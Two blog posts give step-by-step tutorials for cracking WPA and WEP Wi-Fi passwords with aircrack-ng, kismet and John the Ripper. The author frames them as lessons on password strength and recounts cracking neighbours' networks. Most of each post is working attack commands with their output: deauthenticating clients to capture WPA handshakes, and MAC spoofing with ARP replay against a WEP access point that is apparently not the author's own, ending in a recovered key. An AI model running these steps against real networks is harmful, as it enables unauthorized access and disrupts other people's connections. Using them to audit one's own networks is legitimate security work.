271. Your neighbours' WPA and you

So WEP is very easy to break, but WPA is much more of a challenge and breaking it involves a brute force attack.

The point of this post is to show that 1) you should select reasonably complex passwords (complex from a dictionary/autogeneration POV) and 2) no password is uncrackable, so changing your password on a regular basis is a good idea.

See http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html to get set up with aircrack and kismet.

For this post I used my office wifi and my android phone as the client.
 AP: "edunet2", Channel 6, MAC 00:1F:33:30:XX:XX,  Client: MAC 00:23:76:B0:XX:XX

---

Snooping
Kismet is a good tool for this. See here for how to get started with kismet: http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html

Or you could just use your android phone and a decent wireless scanner...

---

Attacking
First set up your interface and a work directory:

mkdir ~/airscan
cd ~/airscan
sudo airmon-ng start wlan1

Next, start to collect data:

sudo airodump-ng -c 6 --bssid 00:1F:33:30:XX:XX -w psk wlan1

CH  6 ][ Elapsed: 2 mins ][ 2012-10-29 11:43 ][                        
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                           
 00:1F:33:30:XX:XX  -21   0     1536      711    0   6  54e. WPA  TKIP   PSK  edunet2                                                         

 BSSID              STATION            PWR   Rate    Lost  Packets     
 00:1F:33:30:XX:XX  00:23:76:B0:XX:XX  -18   54e-54e     0      

You can now either wait, and wait and wait -- until you manage to capture a handshake (connection between client and AP).

 Or you can force things a bit if there's a client attached. To force it, de-authenticate the real client and hope that it's been set to auto-reconnect.
sudo aireplay-ng -0 1 -a 00:1F:33:30:XX:XX -c 00:23:76:B0:XX:XX wlan1

11:41:03  Waiting for beacon frame (BSSID: 00:1F:33:30:XX:XX) on channel 6
11:41:04  Sending 64 directed DeAuth. STMAC: [00:23:76:B0:XX:XX] [ 0|63 ACKs]

You're done when you see "WPA handshake: 00:1F:33:30:XX:XX" in the upper right corner.

Depending on how far away you are from the AP and the client this may or may not be easy.

Cracking the password exchanged during the handshake is the biggest challenge though.

---

Cracking for show
In the case you actually already know the password (e.g. you're cracking your own wireless), create a file called password.lst with your password in it. Or get a dictionary file and add your password to it.

Then run

aircrack-ng -w password.lst -b 00:1F:33:30:XX:XX psk*.cap

which gives

                                 Aircrack-ng 1.1 r1901


                   [00:00:00] 1 keys tested (389.52 k/s)


                      KEY FOUND! [ supersecretpassword ]


      Master Key     : 49 97 0F F9 BE 9E BB DB 9B 92 70 E2 2A 31 D5 1D 
                       29 31 24 17 83 E9 45 63 D3 B0 E1 AE FA 65 DF 7B 

      Transient Key  : 37 6A 8D BC D6 2F 13 BD 31 DA B8 F4 21 A7 65 5C 
                       A9 39 9A 6B 68 44 D6 12 17 D2 E2 A5 6E 9E 51 19 
                       4D A7 F7 5E 96 EB 41 06 D5 55 8A 53 23 04 66 D1 
                       86 AC CC A1 13 17 CC 1A BF 62 9E 9B 20 6C DC 10 

      EAPOL HMAC     : B3 07 9D 1A 16 A4 E0 EB C2 EE 71 81 D5 CB 56 E8 

As far as I understand aircrack-ng only support dictionary based attacks for WPA.

---

Brute-force using John the Ripper (sort of):
Ideally I should use the method shown below this section, but I haven't quite gotten that to work.

Instead I use john to generate the random strings and pipe them to aircrack-ng:

/opt/john/john-1.7.9/run/./john  --incremental=Alpha --stdout| aircrack-ng -b 00:1F:33:30:XX:XX -w - psk*.cap

And that kind of works, although awkwardly so -- you can look at john.conf for limits to how the random passwords are generated (i.e. MaxLen, MinLen)

What should've worked follows below -- but it doesn't work for me.

---

So far not working:
*In theory everything below works, but I'm having no luck cracking the password even if I put it in the dictionary -- which is the points of the whole exercise.

Brute-forcing using John the Ripper:
This requires more brawn than brain, so using e.g. John the Ripper may be a good idea. See here for a suitable set-up for a beowulf cluster: http://verahill.blogspot.com.au/2012/09/compiling-john-ripper-singleserial.html

The only issue is that John the Ripper doesn't handle cap files directly.

Compile and install cap2hccap:

mkdir ~/tmp/cap2hccap
cd ~/tmp/cap2hccap
wget http://sourceforge.net/projects/cap2hccap/files/cap2hccap.tar.gz
tar xvf cap2hccap.tar.gz
make

That creates a binary called cap2hccap.bin.

You might get a few warnings, but that's nothing to worry about. You might want to move the binary to e.g. /usr/local/bin

sudo mv cap2hccap.bin /usr/local/bin/

Convert your cap file from before

cap2hccap.bin psk-02.cap psk-02.hccap

[info    ]      writing handshake for "edunet2".

Convert that file in turn:

/opt/john/john-1.7.9-jumbo-6/run/hccap2john psk-02.hccap > psk-02.john

And crack

touch john.ini

john --wordlist=password.lst --format=wpapskda psk-02.john

I'm just generally having very little luck with john the ripper to be honest, regardless of what I'm trying to crack -- so far I've only managed to test the password strengths of users on one of my linux boxes.

---

Errors:
If you get

./hccap2john psk-02.hccap psk-02.john

hccap2john: hccap2john.c:75: process_file: Assertion `bytes==392' failed.
Aborted

you should upgrade to version 1.7.9-jumbo-7 or better.
 Bug reported here: https://bugs.archlinux.org/task/30516 and here: http://www.openwall.com/lists/john-dev/2012/07/07/3

If you get

john --wordlist=/opt/john/wordlist.lst --format=wpapsk psk-02.john

fopen: $JOHN/john.ini: No such file or directory

just create a file called john.ini in your working directory

touch john.ini

269. Your neighbours' WEP wifi and you

A few years ago when I was living in an apartment block mainly inhabited by university students I took to cracking the passwords to my neighbours' WEP 'protected' wifi networks whenever I got bored -- the cracking WEP doesn't require much either in terms of brain or brawn, so it's admittedly not much of an accomplishment.

I'm writing this based off of notes I wrote a long time ago to teach people in the lab how to do various 'interesting' things with computers. Partly because even as a chemist you need to be able to -- you encounter the odd computer with a windows password or bios password which has been forgotten with time, but which is in a critical role, e.g. controlling an expensive instrument. Also, a fair number of research groups run their own wireless networks, and a lot of group leaders are barely computer literate. My pet theory is that this explains why so many of my colleagues use Macintosh...

So here's how to deal with WEP. The legality of this isn't questionable -- it is illegal to hack OTHER people's networks in most jurisdictions.

But here's a thought -- set up your own network and crack it for fun.  Once you realise how easy it is you'll never look at WEP the same way again. You'll also understand why using a hidden SSID and MAC filtering doesn't do much to protect you.

 Also, you'll most likely realise a few things which you can do to make it a little bit more troublesome to hack a WEP network (eventually it'll fall -- as will of course WPA2, although that's often requires brute force cracking which can take anything from 1 s to millenia)

DON"T GET YOURSELF IN TROUBLE BY BREAKING THE LAW. Also, be nice to your neighbours.

Anyway, WEP.

You'll need aircrack-ng and you might want kismet.

---

Kismet is available in the repos

sudo apt-get install kismet

You will need to edit /etc/kismet/kismet.conf to set it up for your particular wireless card. I've got a Sabrent High-power wireless-N USB device with a nice little antenna:

Bus 002 Device 003: ID 148f:2870 Ralink Technology, Corp. RT2870 Wireless Adapter

So I put the following in my /etc/kismet/kismet.conf

source=rt73,wlan1,expt

Use kismet to snoop for WEP wifi's and then get lists of associate clients:

sudo kismet

Once you've started it, hit s to sort, and w to sort by wep/wpa. Select the network you're interested in and hit i for information and c for a list of attached clients (good to know if they have MAC based filtering). Capital Q exits.

Note that you don't really NEED kismet. It just happens to be a good tool, so if you're stuck with figuring out how to set it up, you can skip this section.

Anyway, I found an AP with a bssid of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C). The AP is using channel 1.

---

You do need Aircrack-ng.

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar xvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1/

Edit common.mak and change

70 CFLAGS          ?= -g -W -Wall -Werror -O3

to

70 CFLAGS          ?= -g -W -Wall -O3

Compile and install:

make

sudo make install

You might get a fair bit of errors about variables being set (e.g. ndiswrapper) but not used. No worries.

---

If you were using network-manager you would now turn it off:

sudo service network-manager stop

If you're using your wirless card (i.e. have it set up) there's a long list of other things which may need to be stopped:

ps aux|grep dhclient
ps aux|grep wpa_supplicant
sudo service wicd stop

sudo service avahi-daemon stop

But if you haven't configured you external USB card and you're not using network-manager you don't need to stop anything e.g. I only use my sabrent card for kismet and aircrack so I don't need to stop anything.

We need a directory to work in:

mkdir ~/airscan

cd ~/airscan

Time to set up your card in monitoring mode (wlan2 is my sabrent, wlan0 is my wicd-controlled internal laptop wifi):

sudo airmon-ng start wlan2

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID Name
2877 avahi-daemon
2878 avahi-daemon
4813 wpa_supplicant
4888 dhclient
Process with PID 4813 (wpa_supplicant) is running on interface wlan0
Process with PID 4888 (dhclient) is running on interface wlan0

Interface Chipset  Driver
wlan2  Ralink RT2870/3070 rt2800usb - [phy1]
    (monitor mode enabled on mon0)
wlan0  Unknown  iwlwifi - [phy0]

Check that there's a monX interface:

sudo ifconfig

mon0      Link encap:UNSPEC  HWaddr 00-0D-0A-53-19-XX-3A-30-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:238 errors:0 dropped:238 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:16279 (15.8 KiB)  TX bytes:0 (0.0 B

If you didn't use e.g. kismet above you can now scan the local environment using aireplay-ng (sudo aireplay-ng -9 mon0), although it often doesn't pick up all the networks which are accessible.

---

The attack

A. Anyway, using kismet we earlier found an AP with a bssid of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C) and another with 00:13:E8:8E:46:XX (Intel). The AP is using channel 1.

sudo airodump-ng -c 1 --bssid 00:1D:92:16:XX:XX -w output mon0

If you get a message about the channel being fixed, then you failed to stop something earlier (e.g. dhclient, wpa_supplicant). If all went well you'll be looking at something like this:

 
CH  1 ][ Elapsed: 0 s ][ 2012-10-28 18:37                                        BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSI
00:1D:92:16:XX:XX  -76   0       30        7    1   1  54e  WEP  WEP             

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes        00:1D:92:16:XX:XX  00:13:E8:8E:46:XX  -77    2 -12e     1        5 

Important things here:
1. Make sure you're listening to the right channel (first row)
2. The MAC addresses listed under 'STATION' are connected clients. Good to know if you want to do mac spoofing.
3. The Data column is what you will want to keep your eyes on. These are the data packets which you're after and which will help you crack the WEP password.

In theory this is all you need to do, and you could just go away for an hour or two while you're passively collecting data. In most cases, you will want to speed things up, however.

B. To do that, in a second terminal run:

sudo aireplay-ng -1 0 -a 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one

The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h).
 ifconfig mon0 hw ether 00:13:E8:8E:46:XX
18:39:40  Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1
18:39:40  Sending Authentication Request (Open System)
18:39:42  Sending Authentication Request (Open System)
18:39:44  Sending Authentication Request (Open System)
18:39:46  Sending Authentication Request (Open System)
18:39:48  Sending Authentication Request (Open System)
18:39:48  Authentication successful
18:39:48  Sending Association Request
18:39:48  Association successful :-) (AID: 1)

and in a third terminal doing

sudo aireplay-ng -3 -b 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one

The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h).
 ifconfig mon0 hw ether 00:13:E8:8E:46:XX
18:53:56  Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1
Saving ARP requests in replay_arp-1028-185356.cap
You should also start airodump-ng to capture replies.
Read 16660 packets (got 3 ARP requests and 18 ACKs), sent 7334 packets...(500 pps)

To be honest I don't know what the effect of this is like on the user whose MAC you are spoofing. I tend to stir things up for five minutes, then stop, wait ten minutes, then another five minutes, and it works quite ok. Also, sometimes you get higher data rates when you're NOT trying to push it. Each network is a little bit different.

It should also now be obvious to you that filtering your wireless based on MAC really doesn't protect your network at all -- as soon as a client connects you've give a useable MAC address away. Same goes for hidden SSIDs. Your ONLY recourse is choosing a good password and not using WEP.

C. Once you've started capturing data (see A) you can start cracking:

In a fourth terminal run the following (and leave it running -- it'll preiodically re-run when there's enough new data)

sudo aircrack-ng -b 00:1D:92:16:XX:XX output*.cap

Aircrack-ng 1.1 r1892

[01:49:20] Tested 27854 keys (got 10135 IVs)

   KB    depth   byte(vote)
    0    0/ 24   6D(14592) A1(14592) D2(14592) 9E(14336) BA(14336) 26(14080) 13(13824) B4(13824) AE(13312) B2(13312) DF(13056) 
    1    3/  5   93(14080) CE(13568) 4C(13312) 7E(13312) 93(13312) E6(13312) 16(13056) BB(13056) E3(13056) F0(13056) 17(12800) 
    2    2/  3   67(15104) 57(13824) B8(13568) 22(13312) 4B(13312) B3(13312) EB(13312) 73(13056) 76(13056) C0(13056) D7(13056) 
    3    1/ 12   69(14848) 71(14592) 30(14592) 96(14080) A4(13568) 1D(13568) 35(13568) 8F(13312) B8(13056) E4(13056) 5F(13056) 
    4    4/  8   63(13824) 2E(13568) E6(13568) ED(13568) 80(13312) AD(13312) C6(13312) EC(13312) 1C(12800) 21(12800) 7A(12800) 

                     KEY FOUND! [ 6D:61:67:69:63 ] (ASCII: magic )
 Decrypted correctly: 100%

Typically you won't have much luck until you have 5-20k IVs. Sometimes that's quick and easy (I've cracked APs in 3-4 minutes), sometimes it's slow and cumbersome (can take hours doing passive snooping).

And that's how easy WEP is to break. Don't use it.